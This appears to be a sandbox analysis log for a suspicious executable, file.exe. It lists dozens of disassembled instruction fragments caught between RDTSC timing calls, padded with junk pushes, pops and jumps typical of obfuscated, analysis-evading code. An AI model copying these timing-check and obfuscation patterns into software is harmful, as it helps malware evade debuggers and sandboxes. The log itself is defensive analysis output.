Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5280343 second address: 5280359 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04B2CB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5280359 second address: 528035D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 528035D second address: 5280361 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5280361 second address: 5280367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5280367 second address: 5280384 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4E04B2CB29h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5280384 second address: 5280388 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0914 second address: 52B091A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B091A second address: 52B091E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B091E second address: 52B0947 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d call 00007F4E04B2CB28h 0x00000012 pop esi 0x00000013 mov ecx, edx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0947 second address: 52B09E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04C4CBFCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F4E04C4CC00h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov ecx, edi 0x00000013 movsx edx, cx 0x00000016 popad 0x00000017 xchg eax, ecx 0x00000018 jmp 00007F4E04C4CC04h 0x0000001d xchg eax, esi 0x0000001e jmp 00007F4E04C4CC00h 0x00000023 push eax 0x00000024 jmp 00007F4E04C4CBFBh 0x00000029 xchg eax, esi 0x0000002a jmp 00007F4E04C4CC06h 0x0000002f lea eax, dword ptr [ebp-04h] 0x00000032 jmp 00007F4E04C4CC00h 0x00000037 nop 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F4E04C4CC07h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B09E6 second address: 52B09FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4E04B2CB24h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B09FE second address: 52B0A2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F4E04C4CBFEh 0x0000000e nop 0x0000000f jmp 00007F4E04C4CC00h 0x00000014 push dword ptr [ebp+08h] 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52B0AA2 second address: 52B0AA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0217 second address: 52A0305 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04C4CBFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F4E04C4CC06h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov cx, bx 0x00000014 pushfd 0x00000015 jmp 00007F4E04C4CBFDh 0x0000001a xor si, B5E6h 0x0000001f jmp 00007F4E04C4CC01h 0x00000024 popfd 0x00000025 popad 0x00000026 xchg eax, ebp 0x00000027 jmp 00007F4E04C4CBFEh 0x0000002c mov ebp, esp 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F4E04C4CBFEh 0x00000035 sbb eax, 269AB4B8h 0x0000003b jmp 00007F4E04C4CBFBh 0x00000040 popfd 0x00000041 popad 0x00000042 push FFFFFFFEh 0x00000044 jmp 00007F4E04C4CC05h 0x00000049 call 00007F4E04C4CBF9h 0x0000004e jmp 00007F4E04C4CBFEh 0x00000053 push eax 0x00000054 pushad 0x00000055 mov bh, 06h 0x00000057 pushfd 0x00000058 jmp 00007F4E04C4CBFAh 0x0000005d xor ax, D978h 0x00000062 jmp 00007F4E04C4CBFBh 0x00000067 popfd 0x00000068 popad 0x00000069 mov eax, dword ptr [esp+04h] 0x0000006d push eax 0x0000006e push edx 0x0000006f jmp 00007F4E04C4CC04h 0x00000074 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0305 second address: 52A030D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A030D second address: 52A031C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A031C second address: 52A0320 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0320 second address: 52A0326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0326 second address: 52A039A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4E04B2CB23h 0x00000008 mov ah, ECh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 jmp 00007F4E04B2CB22h 0x00000016 pop eax 0x00000017 pushad 0x00000018 mov edi, ecx 0x0000001a push eax 0x0000001b pushfd 0x0000001c jmp 00007F4E04B2CB29h 0x00000021 adc ax, DE36h 0x00000026 jmp 00007F4E04B2CB21h 0x0000002b popfd 0x0000002c pop ecx 0x0000002d popad 0x0000002e push 3383EA8Ah 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A039A second address: 52A03A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A03A0 second address: 52A03BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4E04B2CB27h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A03BB second address: 52A03BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A03BF second address: 52A0433 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 add dword ptr [esp], 41BA40E6h 0x0000000f pushad 0x00000010 mov cx, di 0x00000013 pushfd 0x00000014 jmp 00007F4E04B2CB27h 0x00000019 adc cx, 217Eh 0x0000001e jmp 00007F4E04B2CB29h 0x00000023 popfd 0x00000024 popad 0x00000025 mov eax, dword ptr fs:[00000000h] 0x0000002b pushad 0x0000002c mov eax, 2453E163h 0x00000031 mov ah, 30h 0x00000033 popad 0x00000034 push edx 0x00000035 jmp 00007F4E04B2CB20h 0x0000003a mov dword ptr [esp], eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0433 second address: 52A0437 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0437 second address: 52A043B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A043B second address: 52A0441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0441 second address: 52A0480 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04B2CB24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 18h 0x0000000c jmp 00007F4E04B2CB20h 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007F4E04B2CB1Dh 0x0000001a mov edx, ecx 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0480 second address: 52A04CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04C4CBFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F4E04C4CBFAh 0x00000013 xor eax, 2ED8CAC8h 0x00000019 jmp 00007F4E04C4CBFBh 0x0000001e popfd 0x0000001f call 00007F4E04C4CC08h 0x00000024 pop eax 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A04CC second address: 52A053A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04B2CB20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007F4E04B2CB20h 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 jmp 00007F4E04B2CB1Eh 0x00000016 popad 0x00000017 push eax 0x00000018 pushad 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F4E04B2CB23h 0x00000020 and ax, 0C7Eh 0x00000025 jmp 00007F4E04B2CB29h 0x0000002a popfd 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A053A second address: 52A0556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov ax, 0C1Dh 0x00000009 popad 0x0000000a xchg eax, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4E04C4CBFFh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0556 second address: 52A05A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4E04B2CB1Fh 0x00000009 sbb cx, 673Eh 0x0000000e jmp 00007F4E04B2CB29h 0x00000013 popfd 0x00000014 movzx eax, di 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F4E04B2CB1Fh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A05A0 second address: 52A0643 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 7D9B8C5Ah 0x00000008 push edi 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], edi 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F4E04C4CC03h 0x00000017 sub ch, FFFFFFAEh 0x0000001a jmp 00007F4E04C4CC09h 0x0000001f popfd 0x00000020 movzx eax, bx 0x00000023 popad 0x00000024 mov eax, dword ptr [75444538h] 0x00000029 jmp 00007F4E04C4CC03h 0x0000002e xor dword ptr [ebp-08h], eax 0x00000031 jmp 00007F4E04C4CC06h 0x00000036 xor eax, ebp 0x00000038 jmp 00007F4E04C4CC01h 0x0000003d nop 0x0000003e jmp 00007F4E04C4CBFEh 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 mov ax, A383h 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0643 second address: 52A0648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0648 second address: 52A0749 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 mov al, 64h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F4E04C4CBFFh 0x00000013 sbb eax, 0D990CDEh 0x00000019 jmp 00007F4E04C4CC09h 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F4E04C4CC00h 0x00000025 sub eax, 495A2CD8h 0x0000002b jmp 00007F4E04C4CBFBh 0x00000030 popfd 0x00000031 popad 0x00000032 lea eax, dword ptr [ebp-10h] 0x00000035 jmp 00007F4E04C4CC06h 0x0000003a mov dword ptr fs:[00000000h], eax 0x00000040 pushad 0x00000041 movzx eax, dx 0x00000044 pushfd 0x00000045 jmp 00007F4E04C4CC03h 0x0000004a xor cx, 6CFEh 0x0000004f jmp 00007F4E04C4CC09h 0x00000054 popfd 0x00000055 popad 0x00000056 mov dword ptr [ebp-18h], esp 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c pushfd 0x0000005d jmp 00007F4E04C4CC03h 0x00000062 adc ah, 0000000Eh 0x00000065 jmp 00007F4E04C4CC09h 0x0000006a popfd 0x0000006b call 00007F4E04C4CC00h 0x00000070 pop ecx 0x00000071 popad 0x00000072 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0749 second address: 52A074F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A074F second address: 52A0753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0753 second address: 52A07A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr fs:[00000018h] 0x0000000e jmp 00007F4E04B2CB26h 0x00000013 mov ecx, dword ptr [eax+00000FDCh] 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F4E04B2CB1Dh 0x00000022 and cl, 00000056h 0x00000025 jmp 00007F4E04B2CB21h 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A07A4 second address: 52A07AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A07AA second address: 52A07E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04B2CB26h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test ecx, ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4E04B2CB27h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A07E1 second address: 52A0823 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04C4CC09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007F4E04C4CC4Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F4E04C4CC09h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0823 second address: 52A0833 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4E04B2CB1Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0833 second address: 52A0899 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04C4CBFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add eax, ecx 0x0000000d jmp 00007F4E04C4CC06h 0x00000012 mov ecx, dword ptr [ebp+08h] 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F4E04C4CBFEh 0x0000001c or cx, 0958h 0x00000021 jmp 00007F4E04C4CBFBh 0x00000026 popfd 0x00000027 push eax 0x00000028 push edx 0x00000029 call 00007F4E04C4CC06h 0x0000002e pop ecx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52A0899 second address: 52A08DA instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4E04B2CB1Bh 0x00000008 sub ax, 94CEh 0x0000000d jmp 00007F4E04B2CB29h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 test ecx, ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F4E04B2CB1Dh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290279 second address: 5290322 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04C4CC09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F4E04C4CBFCh 0x00000011 add cl, FFFFFF98h 0x00000014 jmp 00007F4E04C4CBFBh 0x00000019 popfd 0x0000001a pushfd 0x0000001b jmp 00007F4E04C4CC08h 0x00000020 jmp 00007F4E04C4CC05h 0x00000025 popfd 0x00000026 popad 0x00000027 push eax 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F4E04C4CC07h 0x0000002f and esi, 38DC6C6Eh 0x00000035 jmp 00007F4E04C4CC09h 0x0000003a popfd 0x0000003b push eax 0x0000003c push edx 0x0000003d mov cl, 12h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290322 second address: 5290350 instructions: 0x00000000 rdtsc 0x00000002 call 00007F4E04B2CB23h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4E04B2CB22h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290350 second address: 5290356 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290356 second address: 5290385 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e mov bh, F4h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007F4E04B2CB1Ah 0x00000019 sub cx, ACA8h 0x0000001e jmp 00007F4E04B2CB1Bh 0x00000023 popfd 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290385 second address: 52903D0 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 4F0B379Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a sub esp, 2Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F4E04C4CC07h 0x00000016 or esi, 6B79829Eh 0x0000001c jmp 00007F4E04C4CC09h 0x00000021 popfd 0x00000022 mov dl, ah 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290457 second address: 529045B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 529045B second address: 529045F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 529045F second address: 5290465 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290465 second address: 52904A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4E04C4CC09h 0x00000009 adc al, 00000006h 0x0000000c jmp 00007F4E04C4CC01h 0x00000011 popfd 0x00000012 mov bx, cx 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 sub edi, edi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52904A5 second address: 52904AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52904AB second address: 52904CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04C4CC07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52904CD second address: 52904D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52904D1 second address: 52904D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52904D7 second address: 52904F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4E04B2CB29h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52904F4 second address: 52904F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52905E8 second address: 52905FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04B2CB1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov edx, esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52905FC second address: 529065D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04C4CC08h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F4E04C4CC02h 0x0000000f xor cx, E768h 0x00000014 jmp 00007F4E04C4CBFBh 0x00000019 popfd 0x0000001a popad 0x0000001b push eax 0x0000001c pushad 0x0000001d mov cl, bh 0x0000001f mov dx, si 0x00000022 popad 0x00000023 nop 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 movsx edi, si 0x0000002a jmp 00007F4E04C4CC00h 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 529065D second address: 5290663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5290663 second address: 5290667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52906D2 second address: 529073F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04B2CB29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-14h], edi 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F4E04B2CB1Ch 0x00000013 sbb esi, 769B2E78h 0x00000019 jmp 00007F4E04B2CB1Bh 0x0000001e popfd 0x0000001f mov ah, B1h 0x00000021 popad 0x00000022 jne 00007F4E74C8A89Ch 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F4E04B2CB1Ch 0x00000031 xor cx, 48D8h 0x00000036 jmp 00007F4E04B2CB1Bh 0x0000003b popfd 0x0000003c push esi 0x0000003d pop ebx 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 529073F second address: 529078B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007F4E04C4CC07h 0x0000000b and eax, 6EF3504Eh 0x00000011 jmp 00007F4E04C4CC09h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebx, dword ptr [ebp+08h] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov cl, dh 0x00000022 movzx esi, dx 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 529078B second address: 52907AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04B2CB1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-2Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F4E04B2CB1Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52907AE second address: 52907B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52907B2 second address: 52907B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52907B8 second address: 52907E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E04C4CBFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4E04C4CC07h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 52907E4 second address: 52907F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
